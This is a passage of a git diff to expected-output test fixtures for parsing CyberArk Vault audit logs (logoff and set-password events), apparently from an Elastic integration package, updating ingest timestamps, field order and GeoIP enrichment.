"67.43.156.13" }, @@ -729,7 +774,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641151100Z", + "ingested": "2021-12-14T14:42:41.147017773Z", "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", @@ -754,6 +799,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -806,7 +860,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641154800Z", + "ingested": "2021-12-14T14:42:41.147018266Z", "original": "\u003c5\u003e1 2021-03-11T17:48:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:28\",\"IsoTimestamp\":\"2021-03-11T17:48:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", @@ -831,6 +885,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -874,7 +937,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641159200Z", + "ingested": "2021-12-14T14:42:41.147018609Z", "original": "\u003c5\u003e1 2021-03-11T17:49:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:49:06\",\"IsoTimestamp\":\"2021-03-11T17:49:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -899,6 +962,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -942,7 +1014,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641164600Z", + "ingested": "2021-12-14T14:42:41.147018949Z", "original": "\u003c5\u003e1 2021-03-14T12:57:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:20\",\"IsoTimestamp\":\"2021-03-14T12:57:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -967,10 +1039,28 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -1019,7 +1109,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641168500Z", + "ingested": "2021-12-14T14:42:41.147019277Z", "original": "\u003c5\u003e1 2021-03-14T13:49:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:36\",\"IsoTimestamp\":\"2021-03-14T13:49:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "8", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json index 9d7c7ab2acd..4694007379d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,28 +37,23 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320124300Z", + "ingested": "2021-12-14T14:42:42.969867619Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -81,6 +69,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -97,14 +90,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320131800Z", + "ingested": "2021-12-14T14:42:42.969870517Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -143,7 +143,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320135400Z", + "ingested": "2021-12-14T14:42:42.969870983Z", "original": "Mar 08 02:54:46 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -153,18 +153,6 @@ ] }, { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -180,6 +168,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -196,28 +189,23 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320140200Z", + "ingested": "2021-12-14T14:42:42.969871378Z", "original": "\u003c5\u003e1 2021-03-10T08:29:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:19\",\"IsoTimestamp\":\"2021-03-10T08:29:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -233,6 +221,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -249,28 +242,23 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320145400Z", + "ingested": "2021-12-14T14:42:42.969871782Z", "original": "\u003c5\u003e1 2021-03-10T08:29:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:28\",\"IsoTimestamp\":\"2021-03-10T08:29:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -286,6 +274,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -302,28 +295,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320150400Z", + "ingested": "2021-12-14T14:42:42.969872170Z", "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -339,6 +336,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -355,28 +357,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320154900Z", + "ingested": "2021-12-14T14:42:42.969872565Z", "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -392,6 +398,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -408,28 +419,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320159200Z", + "ingested": "2021-12-14T14:42:42.969873073Z", "original": "\u003c5\u003e1 2021-03-10T09:11:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:55\",\"IsoTimestamp\":\"2021-03-10T09:11:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -445,6 +460,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -461,28 +481,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320163200Z", + "ingested": "2021-12-14T14:42:42.969873500Z", "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -498,6 +522,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -514,28 +543,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - 